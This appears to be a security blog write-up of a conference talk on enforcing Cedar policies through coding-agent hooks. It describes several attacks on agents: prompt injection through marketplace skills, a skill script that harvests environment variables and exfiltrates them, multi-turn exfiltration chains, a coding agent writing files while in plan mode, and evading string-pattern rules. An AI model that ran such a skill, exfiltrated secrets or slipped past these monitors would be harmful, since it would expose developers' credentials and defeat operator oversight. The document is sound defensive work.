![Matt Maisel presenting talk - Matt Maisel - Hooking Coding Agents with the Cedar Policy Language | [un]prompted 2026 at Unprompted 2026](https://thecyberarchive.com/assets/teasers/cedar-policy-language-coding-agent-security-matt-maisel.webp)
A coding agent running in plan mode can still write files to disk — and without a deterministic policy layer sitting outside the model, your only defense is a system prompt that the agent itself could ignore or circumvent. Cedar policy language for coding agent security changes that calculus by enforcing rules at the hook level, making every shell command, file write, and tool call subject to formal policy adjudication before execution.
For security engineers building or defending AI-powered development environments, this post breaks down how to model the agent’s action space as a trajectory event stream, wire Cedar policies into existing coding agent hooks across Gemini CLI, Claude Code, and Cursor, and use information flow control with YARA signatures to detect and block lethal trifecta attacks in real time.
Key Takeaways
- You'll learn how to model a coding agent's runtime behavior as a trajectory event stream — actions, observations, control, and state — giving you precise hook points for policy enforcement instead of relying on prompt-level guardrails.
- You'll be able to implement a Cedar-based policy harness that intercepts agent hooks across Gemini CLI, Claude Code, and Cursor to allow, modify, or block agent actions using formally verifiable, attribute-based policies.
- Apply information flow control and YARA-based taint tracking across multi-turn agent loops to dynamically revoke tool access when sensitive data enters the trajectory context, preventing exfiltration without over-restricting utility.
Modeling Coding Agent Behavior as a Trajectory Event Stream
Coding agents operate in tight, continuous loops: they plan, generate code, execute tools, observe results, and loop again. Without a structured model of what happens at each step, it’s impossible to know where to insert security controls. The Cedar policy language for coding agent security begins by solving exactly this problem — translating the agent’s runtime behavior into a precise, hookable event taxonomy.
The Four Event Types in the Trajectory Model
The trajectory event stream maps the full lifecycle of an agent’s execution into four distinct event types:
- Action events — The agent initiates changes to its environment: writing or modifying files, running shell commands, executing code. These are the events that mutate state and carry the highest exfiltration risk.
- Observation events — The environment responds. After an action, the environment emits feedback back to the agent as input to the next model inference call. This is where untrusted data enters the context — for example, a skill fetched over a web request from a marketplace could return a response containing a prompt injection payload.
- Control events — These handle coordination: user prompts, permission requests, sub-agent spawning, and agent-to-agent orchestration. They govern who can direct the agent and what instructions it accepts.
- State events — Mechanical bookkeeping: memory compaction, pruning, environment snapshots. These events capture changes to the agent’s persistent memory and execution context.
Together, these four event types form a complete, ordered description of what the agent does over time — a trajectory. Every action the agent takes, every piece of data it ingests, every directive it receives, and every state change it makes is captured by one of these four categories.
Why This Model Is Security-Critical
The trajectory event model is not just an architectural abstraction — it’s the foundation for precise threat modeling. Traditional application security focuses on request/response boundaries. With coding agents, the threat surface is more complex: the agent acts autonomously across multiple turns, accumulates context, and can be influenced by data it retrieves long before any harmful action is taken.
By mapping behavior to trajectory events, you gain two security capabilities that don’t exist at the prompt level:
- Hook precision — You know exactly which event types to intercept and at what lifecycle stage. Shell command execution maps to an action event. A marketplace skill returning data maps to an observation event. A user instruction maps to a control event. Each is a discrete interception point.
- Threat model completeness — When you map attack patterns like the lethal trifecta (untrusted input + sensitive data in context + exfiltration channel) onto the event stream, you can see which event types participate in each threat. Multi-step attacks that unfold over several turns — combining observation events that introduce tainted data with later action events that exfiltrate it — become visible and traceable.
From Event Model to Policy Enforcement Points
The trajectory model directly determines where policy enforcement points can be placed. Each event type is a potential hook location — a position in the agent loop where a reference monitor can intercept execution, evaluate a policy, and decide whether to allow, modify, or block the agent’s next step.
This is the critical insight: without a named, structured event model, hooks are arbitrary injection points with no systematic coverage guarantees. With the trajectory model, every class of agent behavior has a corresponding event type, and every event type has a defined position in the loop where a policy decision can be made before execution proceeds.
The four event types — actions, observations, control, and state — form the vocabulary that makes the rest of the Cedar policy harness possible. They are the primitives on which ABAC rules, YARA signature checks, and information flow control labels are all expressed.
Actionable Takeaways
- Map your coding agent's runtime behavior to the four trajectory event types (actions, observations, control, state) before designing any security control. This gives you a complete inventory of where untrusted data enters the system, where state changes occur, and where exfiltration channels exist.
- Treat observation events — specifically data returned from external sources like marketplace skills or web fetches — as your highest-priority untrusted input surface. These are the points where prompt injection and malicious payloads most commonly enter the agent's context.
- Use the trajectory event taxonomy to map threat models systematically: for each threat pattern you care about (e.g., lethal trifecta, multi-turn exfiltration), identify which event types participate and which turns in the loop carry the risk. This determines where reference monitor hooks must be placed.
Common Pitfalls
- Treating agent security as a prompt-level concern only. Prompt guardrails operate inside the model's inference path and can be ignored, circumvented, or overridden by sufficiently crafted inputs. The trajectory event model exists precisely to move policy enforcement outside the model — to a deterministic layer the agent cannot influence.
- Conflating observation events with benign feedback. Observations are the agent's primary input channel from the external world. Any data returned by a tool call, web fetch, or marketplace skill is an observation — and is therefore an untrusted input surface that must be treated with the same scrutiny as user-supplied data in traditional web applications.
Applying the Lethal Trifecta Threat Model to Agentic Workflows
Cedar policy language for coding agent security addresses a precise, well-understood threat pattern: the lethal trifecta. In agentic workflows, this canonical model maps cleanly onto the four-event trajectory model — and that mapping is what makes it actionable.
The three conditions that define the lethal trifecta are:
- Untrusted input entering the agent context
- Sensitive data already present in that context
- A code or shell execution channel that can exfiltrate that data
When all three are present in the same agent loop, you have the conditions for a complete compromise. The trajectory model makes these conditions visible as distinct event types, giving you specific interception points rather than an abstract risk description.
Mapping the Trifecta to Trajectory Events
In the trajectory event model, each element of the lethal trifecta corresponds to a concrete event category:
Untrusted input → Observation events. Skills fetched over web fetch — for example, a tool pulled from a public marketplace — arrive as observation events. That observation is returned to the model as feedback for the next inference call. If that skill contains prompt injection payloads or malicious instructions, they enter the agent context at exactly this point. The agent has no inherent mechanism to distinguish a trusted internal observation from one carrying injected content.
Sensitive data → Action and state events. Source code, internal documentation, API keys, PII, and environment variables are commonly present in the agent context — either loaded directly into the prompt, retrieved from memory, or accessed during prior file read actions. These aren’t edge cases: a coding agent working on a real codebase routinely touches sensitive material as part of normal operation.
Code execution channel → Action events (shell commands, code execution). Shell command actions and code execution are the exfiltration vectors. A requests.post() to an external host, a curl to an attacker-controlled endpoint, or an environment variable harvest followed by a network call — all of these surface as action events in the trajectory. Without a policy layer intercepting these events, the agent will execute them.
Beyond Data Exfiltration: Multi-Turn Attack Chains
The lethal trifecta as described above captures the simplest case — a single-turn compromise where untrusted input, sensitive data, and an execution channel all align within one loop iteration. But the trajectory model exposes a more dangerous class of attacks: multi-step, multi-turn chains that unfold across several iterations of the agent loop.
In these attacks, observations and actions interact over multiple turns. A malicious skill might first establish a foothold by modifying a configuration file (an action event), then wait for a subsequent loop iteration where sensitive data is loaded into context (a state event), and only then trigger the exfiltration (another action event). No single turn looks catastrophically suspicious in isolation — but the combined trajectory tells a different story.
This is where the trajectory store becomes a security-relevant data structure, not just a logging mechanism. Because the harness maintains stateful bookkeeping about entities and their labels across turns, it can recognize that a trajectory tainted with sensitive information in turn N should restrict network access in turn N+2 — even if turn N+2 looks benign on its own.
Extending Beyond Exfiltration: OWASP Top 10 for Agentic Applications
Data exfiltration is the trifecta’s most obvious outcome, but it represents only one slice of the agent threat surface. The same trajectory event model supports mapping additional risk frameworks, including the OWASP Top 10 for Agentic Applications[1], onto event boundaries.
This matters because the policy enforcement points you establish for the trifecta — hooks on shell commands, file writes, web fetches, and tool calls — are the same points relevant to a much broader threat catalog: prompt injection, excessive agency, insecure tool use, and supply chain compromise all manifest as detectable patterns in the action, observation, control, and state event stream.
Why This Mapping Matters for Policy Design
Translating the lethal trifecta into trajectory events is not an academic exercise. It directly determines where you need Cedar policy enforcement points:
- Observation events → Policies that inspect incoming skill content for injection indicators (YARA signatures, pattern matching on command payloads)
- State events → Policies that classify data sensitivity when new context is loaded (information flow control labels applied to entities)
- Action events (shell/code) → Policies that check whether the current trajectory carries a sensitive label before permitting outbound network calls or shell executions
Without this mapping, you’re writing policies against generic event types. With it, you’re writing policies against the specific threat conditions that lead to compromise — which is what makes the Cedar harness a genuine defense-in-depth layer rather than a pattern-matching filter.
Actionable Takeaways
- Map every coding agent deployment against the lethal trifecta checklist before writing a single policy: identify where untrusted observations enter the loop (skill fetches, MCP tool responses, web fetch results), what sensitive data routinely appears in the agent context (source code, environment variables, internal docs), and which action event types provide exfiltration channels (shell commands, network calls, code execution). This mapping directly determines your minimum required Cedar policy enforcement points.
- Design information flow control labels to track sensitive data across the full trajectory, not just the turn where it first appears. A PII record loaded into context in turn 1 must taint the trajectory entity so that network-touching action events in turns 2, 3, or later are dynamically restricted — even if no sensitive data is visible in those later turns in isolation.
- Treat multi-turn attack chains as the primary threat model, not single-turn exfiltration. Write policies that reason about trajectory state accumulated across turns — not just the current event in isolation — so that a sequence of individually benign-looking actions cannot compose into a successful compromise.
Common Pitfalls
- Scoping the lethal trifecta only to single-turn attacks. If your policies only inspect the current event without considering the trajectory history, a multi-step attack that distributes its three conditions across multiple loop iterations will bypass every check. The trifecta conditions do not need to co-occur in the same turn — they only need to co-occur in the same trajectory.
- Conflating the data exfiltration scenario with the full threat surface of agentic workflows. The lethal trifecta is the canonical starting point, but it is explicitly described as "just one narrow threat model." Relying solely on trifecta-specific policies while ignoring OWASP Top 10 for Agentic Applications patterns — prompt injection, excessive agency, insecure tool use — leaves significant attack surface unaddressed by the policy layer.
Reference Monitors and Coding Agent Hooks as Policy Enforcement Points
The reference monitor is a foundational security concept — a tamperproof, always-invoked mediator that sits outside a principal and adjudicates every access decision. In the context of Cedar policy language coding agent security, this means placing the monitor outside the model itself, between the agent and the environment, so it can intercept every trajectory event — actions, observations, control events, and state events — before they take effect.
Three properties define a correct reference monitor implementation:
- Always invoked — every relevant event passes through it, no exceptions
- Tamperproof — the agent cannot modify or bypass the monitor
- Verifiable — its behavior can be audited and its policies formally checked
Without these properties, a reference monitor is only a suggestion. An agent operating under prompt-only constraints can ignore or circumvent instructions; a properly positioned external monitor cannot be overridden by the model.
Hooks as Policy Enforcement Points
A reference monitor is only as powerful as the policy enforcement points available to it. This is where coding agent hooks enter the picture. Hooks allow the harness to intercept trajectory events at specific lifecycle stages of the agent loop and decide — before execution — whether to allow, modify, or stop the agent’s action.
Each hook event corresponds to one of the four trajectory event types and gives the policy engine a precise moment to apply Cedar policies. However, the granularity of available hooks varies substantially across coding agent implementations:
Gemini CLI[2]
- Provides before-model and after-model hooks at both ends of the inference call
- Supports individual token streaming, enabling processing at the token level
- This granularity is the richest of the three implementations and supports the widest range of policy checks, including content inspection during generation
Claude Code[3]
- Has no model-level hooks — there are no before/after model call intercept points
- The only available hook is a final agent response notification event, which fires after the agent has already completed its reasoning cycle
- This significantly limits real-time intervention capability; policy can only act at the response boundary, not mid-generation
- Note: despite this limitation, Claude Code can still write files while in plan mode — a behavior the Cedar harness specifically addresses with a policy that forbids writes outside the designated plan file when
permission_modeis set toplan
Cursor[4]
- Provides granular hook types covering MCP tool calls, shell commands, and generic tool calls
- This breadth makes Cursor a strong candidate for fine-grained policy enforcement, particularly for detecting malicious marketplace skills or prompt-injected tool calls
- The lethal trifecta demo in the talk uses Cursor’s shell command hook to intercept and analyze a malicious
metrics.pyfile before execution
Hook Lifecycle Stages and Event Mapping
Each hook fires at a defined lifecycle stage of the agent loop. Mapping those stages back to the trajectory event model gives you a precise inventory of where policy enforcement is possible:
| Hook Type | Trajectory Event | What It Covers |
|---|---|---|
| Before-model (Gemini) | Control / Action | Pre-inference inspection, token-level content policy |
| After-model (Gemini) | Observation | Post-inference output review before it reaches the agent |
| Shell command hook (Cursor) | Action | Shell execution intercept — destructive command detection, YARA scanning |
| MCP tool call hook (Cursor) | Action / Control | Tool invocation intercept — marketplace skill analysis |
| Generic tool call hook (Cursor) | Action | Broad tool use intercept |
| Final response notification (Claude Code) | Observation | Post-cycle response event — limited to notification only |
The gap between implementations is operationally significant. Coding agent hooks that fire before execution (shell, MCP, before-model) are the highest-value enforcement points because they prevent harm. Hooks that fire after the fact (notification events) can only detect and log — they cannot block.
Why Deterministic External Policy Beats Prompt Guardrails
Placing the reference monitor outside the model with hook-based intercepts solves a fundamental problem with prompt-level safety: the model itself is inside the trust boundary being protected. A system prompt that says “do not exfiltrate data” can be overridden by a sufficiently crafted injection in an observation event — because the model processes both the instruction and the injection in the same context window.
A deterministic external monitor with coding agent hooks as enforcement points does not have this problem. Cedar policy evaluation happens in a separate process, outside the model’s reasoning loop. The agent cannot rewrite the policies or instruct the monitor to stand down. This is the architectural guarantee that makes the approach meaningful as a security control rather than a best-effort nudge.
Combining this with complementary defenses — sandboxes for filesystem/network isolation, permission systems for user-facing access control — creates a layered posture where each layer addresses what the others cannot. The Cedar harness adds the layer that neither sandboxes nor permission systems provide: contextual, attribute-enriched, formally verifiable policy enforcement at the event boundary.
Actionable Takeaways
- Audit the hook surface of any coding agent your team deploys before committing to a policy architecture. Map each available hook to the four trajectory event types (actions, observations, control, state) and identify gaps — particularly the absence of pre-execution model hooks in Claude Code. Design your enforcement strategy around the actual intercept points available, not an idealized monitor.
- Prioritize pre-execution hooks (shell command, MCP tool call, before-model) as your primary policy enforcement points. Post-execution hooks (notification events) can feed logging and audit pipelines but cannot block harm. If a target agent only exposes post-execution hooks, escalate to sandbox-level controls to compensate for the enforcement gap.
- Position your reference monitor as a separate process outside the model, not as an additional system prompt or in-context instruction. An external Cedar policy engine that intercepts hook events is tamperproof by construction; an in-context guardrail is subject to the same prompt injection risks it is meant to defend against.
Common Pitfalls
- Assuming uniform hook granularity across coding agents. Gemini CLI, Claude Code, and Cursor expose significantly different hook surfaces. Treating them interchangeably leads to policy gaps — for example, deploying a Cedar harness that relies on pre-model hooks in a Claude Code environment where no such hooks exist, resulting in zero enforcement at the inference boundary.
- Relying solely on permission systems or sandboxes and treating the reference monitor as redundant. Permission systems induce consent fatigue and lack trajectory context; sandboxes can be overly restrictive and still permit semantically dangerous operations within their allowed surface. None of these address the contextual policy enforcement that Cedar at the hook layer provides.
Building a Cedar Policy Harness for Agent Action Adjudication
Why Cedar for Agent Policy Enforcement
Cedar policy language[5] is the core engine choice here, and the reasons are technical, not incidental. Unlike Rego (used in Open Policy Agent), Cedar policies are formally analyzable using symbolic methods — specifically a lean symbolic compiler — that can detect contradictory policies, vacuous rules, and shadowed policy subsets before they ever reach production. That means you can verify your policy set for logical correctness, not just syntax validity.
Cedar also has first-class support for attribute-based access control (ABAC), which maps directly to the entity-attribute model that agent trajectory events produce. A shell command isn’t just “a shell command” — it carries context: which agent issued it, what trajectory it belongs to, what sensitivity labels are attached to the trajectory’s data, what YARA signature categories fired on the command content. All of those are attributes that Cedar can reason about in a single policy decision.
The Harness Architecture: Component by Component
The full harness has four distinct layers working together:
1. Local Adapters
Local adapters are the hook-facing components — commands run by the coding agents themselves. When a hook event fires (a pre-tool-call hook in Cursor, a before-model hook in Gemini CLI), the adapter:
- Receives the hook event over standard input
- Transforms it into the canonical trajectory event model (action, observation, control, or state)
- Forwards the structured event to the local harness service
Each coding agent implementation requires its own adapter because hook interfaces differ significantly. Cursor exposes granular hook types for MCP, shell commands, and generic tool calls. Gemini CLI provides before/after model hooks that allow token-level streaming. Claude Code only exposes the final agent response as a notification event type. The adapter layer abstracts these differences into a unified trajectory event stream.
2. The Cedar Policy Engine
Inside the harness service, the Cedar engine is the decision core. For each incoming trajectory event it:
- Extracts the entities involved (agent, user, trajectory resource)
- Runs the entities and context through any configured guardrails (currently: YARA signatures, information flow control models, a safety model)
- Evaluates the Cedar policies against the enriched entity set
- Returns an allow/deny/modify decision
The harness is explicitly designed as bring-your-own-guardrail: YARA signatures and the information flow control model are the current integrations, but the architecture is open. Any system that can tag entity attributes — a DLP scanner, a data classification API, another safety model — can feed into Cedar policy evaluation.
3. Entity and Trajectory Stores
The harness maintains stateful bookkeeping via entity and trajectory stores. This is what enables multi-turn enforcement. As trajectory events flow through the harness, the stores track:
- Which entities (agents, users, data sources) have been observed
- What sensitivity labels are currently attached to the trajectory
- Historical context that informs dynamic attribute computation for subsequent events
Cedar itself is inherently stateless — a policy decision is made against the current entity set at evaluation time. The entity and trajectory stores bridge that gap by persisting observations between turns and exposing them as dynamic attributes at query time.
4. The Policy Agent (MCP-Driven Policy Authoring)
Writing Cedar policies manually is tedious. The harness includes a policy agent that uses MCP[6] tools to assist with authoring and validation. The policy agent:
- Ships with a skill containing procedural knowledge about Cedar syntax and the harness’s available entity types and context schemas
- First fetches the available context values (entity types, sensitivity labels, YARA signature categories, policy model categories) so the model has accurate schema knowledge
- Generates candidate policies against that schema
- Validates and analyzes them using Cedar’s built-in formal tools — catching contradictions and vacuous rules before deployment
This creates a supervised loop: the policy agent proposes, Cedar’s formal tools verify, and a human reviews before policies go live.
Cedar Schema Design: Entities, Actions, and Context
The Cedar schema for agent trajectory events models three core entity types:
- Agent — the coding agent instance (with attributes like current permission mode, e.g.,
planvs.execute) - User — the human operator (extensible with identity provider attributes)
- Trajectory — the event stream resource (carries sensitivity labels from the IFC model)
Actions map to the trajectory event types: file writes, shell command executions, web fetches, MCP tool calls, and others. Context carries the enriched attributes computed at evaluation time — the YARA signature match results, the IFC sensitivity classification, the current permission mode.
A representative policy structure for blocking file writes in plan mode looks like this (expressed in Cedar semantics): when the agent’s permission mode is plan and the action is WriteFile, forbid the action unless the resource being written is the designated plan file. The policy doesn’t rely on the agent following instructions — it’s enforced deterministically at the hook boundary regardless of what the model does.
Information Flow Control: Taint-Based Dynamic Restriction
The most sophisticated enforcement pattern the harness enables is information flow control (IFC) with taint propagation across turns.
The IFC model uses a safety model (the GPT Safeguards 20B model[7] in the current implementation) to classify data in trajectory events with sensitivity labels — for example, marking a name + date_of_birth + address combination as highly confidential PII. That label is then attached to the trajectory entity in the store.
On subsequent turns, when the agent attempts an action that could exfiltrate data — a web fetch, a network command, an outbound API call — the Cedar engine checks the trajectory’s sensitivity label as a dynamic attribute. If the trajectory is tainted with a high-sensitivity label, the action is denied, and the denial context is returned to the agent.
This is the key distinction from static policies: the restriction is dynamic and context-sensitive. The same WebFetch action is allowed on a clean trajectory and denied on a tainted one. The policy expresses intent (“don’t let data tagged as highly confidential leave the agent’s context”) and the IFC model plus trajectory store handle the classification and persistence.
YARA Signature Integration
YARA rules[8] provide a second guardrail layer for shell command and script content analysis. When a shell command event arrives at the harness, the YARA engine processes the command string (and, where available, the content of any script being executed) against the full YARA rule set before Cedar policy evaluation.
YARA match results are surfaced as entity attributes — specifically, which signature categories fired — and are available to Cedar policies as context. A policy can express: “if the shell command matches a signature in the environment_harvesting YARA category, deny the action.” The lethal trifecta demo with Cursor and the malicious marketplace skill shows this in practice: the metrics.py script’s environment variable harvesting behavior is caught by YARA signatures, the match result is attached to the event context, and the Cedar policy blocks the execution before it runs.
Putting It Together: The Adjudication Flow
End-to-end, a single hook event moves through the harness as follows:
- Hook fires in the coding agent (e.g., pre-shell-command hook in Cursor)
- Local adapter receives the event over stdin, transforms it to a trajectory event, sends to harness service
- Guardrails run: YARA scans command content; IFC model classifies any data in context; safety model assigns sensitivity labels
- Entity extraction: agent, user, trajectory, and action entities are built with all computed attributes
- Cedar evaluation: policies are evaluated against the entity set; a decision (allow/forbid/modify) is returned
- Trajectory store update: entities and labels are persisted for future turns
- Decision returned to adapter: the hook response allows, blocks, or modifies the agent action; denial context is passed back to the agent for steering or user review
This flow is deterministic, tamperproof (running outside the model), and formally verifiable — properties that prompt-level guardrails and most sandbox implementations cannot offer.
PoC 1: Blocking a Destructive SQL Mutation Without a WHERE Clause in Claude Code
Proof of Concept
-
Define the seed Cedar policy. Author a Cedar policy targeting the
ShellCommandorExecuteCodeaction type that inspects the command content for SQL mutation patterns lacking a constraint clause. The forbidden pattern: any SQL statement matchingDELETE FROM <table>orUPDATE <table> SETwithout a subsequentWHEREkeyword. In Cedar syntax, this is aforbidrule with awhencondition applying string or regex matching on the action context attribute. -
Wire the hook adapter in Claude Code. Because Claude Code’s hook support is limited to a final agent response notification event, the harness adapter intercepts the agent’s outbound tool call payload over standard input before the shell or code execution environment receives it. The local adapter process — launched as a pre-execution command by the coding agent scaffold — reads the trajectory event from stdin, serializes it into the Cedar trajectory event model (entity type
ShellCommandorCodeExecution), and forwards it to the local harness service over a local socket or HTTP call. -
Cedar policy engine evaluates the request. The Cedar engine extracts the relevant entities — the agent principal, the action type, and the context attributes including the raw SQL string. It evaluates the request against all loaded Cedar policies. Because
DELETE FROM userscontains no WHERE clause, theforbidrule matches. -
Harness returns a deny decision with context. The Cedar engine returns a
Denyauthorization decision. The harness packages this decision along with the matching policy rule, the specific policy violation reason (unconstrained SQL mutation detected), and the original SQL string into a structured response payload. -
Adapter surfaces the violation to the agent. The local adapter receives the deny payload and returns it to the coding agent over stdout. Claude Code receives the policy violation context as part of its execution feedback loop. The agent can use this context to either self-correct (rewrite the query with an appropriate WHERE clause) or surface the violation to the user for manual review.
-
Outcome — destructive operation blocked deterministically. The
DELETE FROM usersstatement never reaches the database. The block happens at the Cedar policy enforcement point, outside the model, without relying on any prompt-level instruction or sandbox restriction. The policy is formally verifiable — it can be analyzed with Cedar’s symbolic tools to confirm it contains no contradictions or vacuous rules — and is reusable across any agent session that uses the same harness.
PoC 2: PII Taint Propagation Blocking a Web Fetch in Gemini CLI via Information Flow Control
Proof of Concept
-
Establish the agent context with PII. The Gemini CLI agent is given a task that introduces highly confidential PII into its context — specifically a name, a date of birth, and a physical address. This PII enters the trajectory as part of an observation or control event.
-
IFC classification via safety model. The Cedar harness intercepts the trajectory event containing the PII. Internally, the harness runs the GPT Safeguards 20B safety model against the event’s data payload. The safety model is given policy-provided examples of sensitivity label categories (e.g., “highly confidential,” “PII”) and classifies the data accordingly. The trajectory resource entity in the Cedar entity store is then tagged with the corresponding IFC sensitivity label.
-
Taint propagates through the trajectory store. Because the harness maintains a stateful trajectory store (keyed by trajectory ID), the IFC label applied to the trajectory persists across subsequent turns of the agent loop. Any further agent actions operating within this same trajectory context inherit the tainted trajectory resource label.
-
Agent attempts a web fetch. On a subsequent turn, Gemini CLI attempts to call a web fetch tool (e.g., fetching a URL from Google). This is modeled as a
web_fetchaction event in the trajectory event model. The local adapter intercepts this hook event and forwards it to the harness service. -
Cedar policy evaluation blocks the request. The Cedar policy engine evaluates the
web_fetchaction against the loaded policies. A Cedar policy checks thetrajectoryresource’s IFC label attribute. Because the trajectory is tainted with a highly confidential PII label, the policy forbids theweb_fetchaction for this trajectory. Cedar’s ABAC model allows this dynamic, context-sensitive decision without requiring pattern matching on the URL or command content. -
Block response returned to agent. The harness returns a deny decision to the local adapter, which surfaces the policy violation context back to the Gemini CLI agent. The web fetch fails. The agent receives the violation context — including the reason for the block (trajectory tainted with PII label) — which it can use to steer its behavior, request user review, or halt the task.
-
Key design properties demonstrated:
- Stateful enforcement across turns: The taint is set once (when PII enters context) and persists, blocking downstream actions without re-evaluating the data on every turn.
- Deterministic, out-of-model enforcement: The block is applied by the Cedar engine running outside the LLM, not by the model itself — making it tamperproof and not subject to prompt override.
- IFC as a complement to permissions: A blanket permission granting the agent web access remains in place, but Cedar dynamically revokes it when the trajectory label indicates sensitive data is present — avoiding both consent fatigue and over-restriction.
PoC 3: Lethal Trifecta Detection: Malicious Marketplace Skill Harvesting Environment Variables in Cursor
Proof of Concept
-
Attacker stages the malicious skill. A skill is published to a public marketplace. Its advertised purpose is benign — generating code metrics to quantify “vibe coding” quality for the developer. The skill ships with a bundled Python script,
metrics.py, that is not documented in the skill’s description. -
Developer installs the skill in Cursor. An unsuspecting developer installs the marketplace skill into their Cursor coding environment. Because the skill appears legitimate and useful, it is granted normal execution permissions within the agent’s tool scope.
- Lethal trifecta conditions are met:
- Untrusted input (observation): The skill is fetched from a public marketplace and returned as an observation in the agent’s trajectory — untrusted external content entering the agent context.
- Sensitive data in context: The developer’s environment contains environment variables, which may include API keys, secrets, database credentials, or other sensitive configuration values.
- Code execution channel (action): The agent has access to shell command execution, providing the mechanism for exfiltration.
-
Agent triggers the malicious shell command. When the developer invokes the skill, Cursor’s agent executes a shell command that runs
metrics.py. The script is designed to enumerate and collect environment variables from the host environment, then issue an outbound HTTP request to an attacker-controlled endpoint to transmit the harvested data. -
Cedar harness intercepts the shell command event. Cursor’s granular hook system fires a shell command hook at the moment the agent attempts to execute the
metrics.pyscript. The local adapter intercepts the hook event over stdin, transforms it into a trajectory event model entry (action type: shell command execution), and forwards it to the local harness service. -
YARA signatures and guardrails analyze the script. Inside the harness service, the Cedar policy engine extracts the relevant entities and passes the
metrics.pyfile content through the configured guardrails — specifically, the YARA rule set. The YARA signatures identify patterns consistent with environment variable harvesting (e.g., iteration overos.environ) and outbound data exfiltration (e.g.,requests.postwith harvested data as the payload). -
Policy adjudication blocks the execution. The YARA match results are attached as attributes to the Cedar policy entities. A Cedar policy — authored to forbid shell command execution when the executed script matches environment-harvesting or exfiltration signature categories — evaluates to
DENY. The harness returns a block decision to the Cursor hook, preventingmetrics.pyfrom running. -
Policy violation context is surfaced to the agent and user. The harness returns the block decision along with the policy violation context (the specific YARA signature categories matched, the nature of the detected behavior) back through the hook to the agent. This context is available for the agent to use for steering, or for direct review by the developer — making the threat transparent rather than silently suppressed.
- Attack is neutralized before exfiltration occurs. Because the Cedar policy harness operates deterministically outside the model — as a reference monitor that is always invoked, tamperproof, and verifiable — the malicious skill is blocked regardless of whether the agent’s prompt-level guardrails recognized the threat. The environment variables are never accessed or transmitted.
PoC 4: Claude Code Plan Mode Policy Bypass: Blocking File Writes Outside the Plan File
Proof of Concept
-
Trigger condition — agent enters plan mode. Claude Code is invoked with
permission_modeset toplan. In plan mode, the intended behavior is that the agent only produces a plan artifact (the plan file) and does not mutate the environment. However, Claude Code does not natively enforce this restriction at the execution layer. -
Bypass behavior — file write outside the plan file. Despite operating in plan mode, the agent issues a
write_fileaction targeting an arbitrary path (e.g.,src/malicious_payload.py). Without a policy enforcement layer, this action proceeds normally and the file is written to disk. This is the policy bypass: plan mode is a behavioral hint communicated through the prompt and permission context, not a hard execution boundary. - Cedar policy definition — intercept the write action. A Cedar policy is authored to address this gap. The policy checks two conditions on every
write_fileaction event:context.permission_mode == "plan"— the agent is operating in plan moderesource.path != context.plan_file_path— the target file is not the designated plan file
When both conditions are true, the policy issues a
forbiddecision, blocking the write before it reaches the filesystem.forbid ( principal, action == Action::"write_file", resource ) when { context.permission_mode == "plan" && resource.path != context.plan_file_path }; -
Hook wiring — Cedar harness intercepts the trajectory event. The local adapter sitting between Claude Code and the environment intercepts the
write_fileaction event before execution. It transforms the event into a trajectory event model entry, enriching it withpermission_modefrom the Claude Code session context andplan_file_pathfrom the harness configuration. This enriched event is forwarded to the Cedar policy engine. -
Policy adjudication — forbid decision returned. The Cedar policy engine evaluates the enriched event against the policy set. Because
permission_mode == "plan"and the target path is not the plan file, the policy returnsforbid. The harness intercepts the result and blocks the write action from completing. -
Agent feedback — policy violation surfaced. The harness returns a policy violation context back to the agent loop. Claude Code receives the blocked action result as an observation event. The agent can use this feedback to steer behavior (revert to producing only the plan artifact) or the violation is surfaced to the user for review.
- Why this matters — deterministic enforcement outside the model. Claude Code’s hook support is limited compared to Gemini CLI or Cursor — it does not expose before/after model hooks, only a final agent response notification event. However, the file write action itself can still be intercepted at the adapter layer. The Cedar policy closes the plan mode bypass without relying on the model to self-enforce the restriction, which it demonstrably does not do by default. This is a concrete example of policies that govern agent behavior rather than security threats — Cedar policies are not limited to blocking attacks, they can enforce operational constraints as well.
Actionable Takeaways
- Deploy local adapters as the hook-facing interface for each coding agent you need to cover, normalizing their divergent hook APIs into a single trajectory event model before policy evaluation — this is what makes it possible to maintain one policy set across Gemini CLI, Claude Code, and Cursor simultaneously.
- Use Cedar's formal analysis tooling (contradiction detection, vacuous rule checking) via the policy agent's MCP interface before deploying any new policy to production — Cedar's symbolic analysis catches logical errors that testing alone will miss, such as policies that can never fire or policies that silently override each other.
- Implement information flow control labels on the trajectory entity store from day one, even if your initial policies don't use them yet — retrofitting taint tracking into a running harness is significantly harder than adding IFC-based policy conditions to an already-labeled trajectory stream.
Common Pitfalls
- Treating the Cedar harness as a replacement for sandboxes or coding agent permission systems rather than a complement to them. The speaker explicitly positions this as defense in depth: Cedar provides expressive, context-aware policies, but permission systems handle consent flows and sandboxes handle process isolation. Removing other layers because Cedar is in place leaves gaps Cedar was not designed to fill.
- Writing policies that rely on brittle pattern matching — for example, maintaining a hardcoded list of "destructive commands" as string patterns in Cedar policies. This approach invites policy hacking (an attacker who knows your pattern list can craft commands that evade it) and creates a maintenance burden as command surfaces evolve. The recommended approach is attribute-based conditions (IFC labels, YARA category matches, permission mode attributes) that reason about intent and context rather than exact command strings.
Policy Scalability, Goldilocks Calibration, and Future Directions
The Goldilocks Problem: Calibrating Cedar Policies for Agent Utility and Security
Deploying Cedar policies in a coding agent harness is not a fire-and-forget operation. There is an inherent tension in policy design that the team calls the Goldilocks policy zone: policies must be tight enough to block real threats but loose enough to preserve agent utility.
Two failure modes bracket this zone:
- Overly restrictive policies — Rules that are too broad will block legitimate agent actions, degrading the productivity benefit that motivated deploying an AI coding assistant in the first place. If an agent cannot execute the shell commands it needs to run tests or build artifacts, the policy has become an obstacle rather than a safeguard.
- Brittle pattern matching — On the other side, policies built around rigid signature matching on specific destructive command strings (e.g., blocking only
rm -rf /literally) are fragile. Adversarial content — whether from a malicious marketplace skill or a prompt injection — can trivially mutate commands to slip past exact-match rules. This is policy hacking, and it is an active research concern for the team.
The implication for security engineers is that policy calibration is an ongoing, context-dependent process. Policies that work for a security-hardened CI pipeline may be too restrictive for a developer’s local coding environment. The harness is designed to be bring-your-own-context, but that flexibility places the calibration burden on the operator.
Scaling Policy Authorship with Agent-Assisted Generation
Writing Cedar policies by hand is tedious. Cedar’s syntax, while precise, requires familiarity with its entity-attribute model, schema definitions, and the specific event types exposed by the trajectory model. For teams that want to cover a broad set of threat patterns, manual policy authorship does not scale.
The solution the team has implemented is a policy agent — an LLM-powered assistant that uses Cedar’s formal tooling over MCP to help operators author and validate policies. The policy agent:
- Has access to the available entity schemas and context types via an MCP skill
- Fetches the sensitivity labels, YARA signature categories, and information flow control categories from the policy model
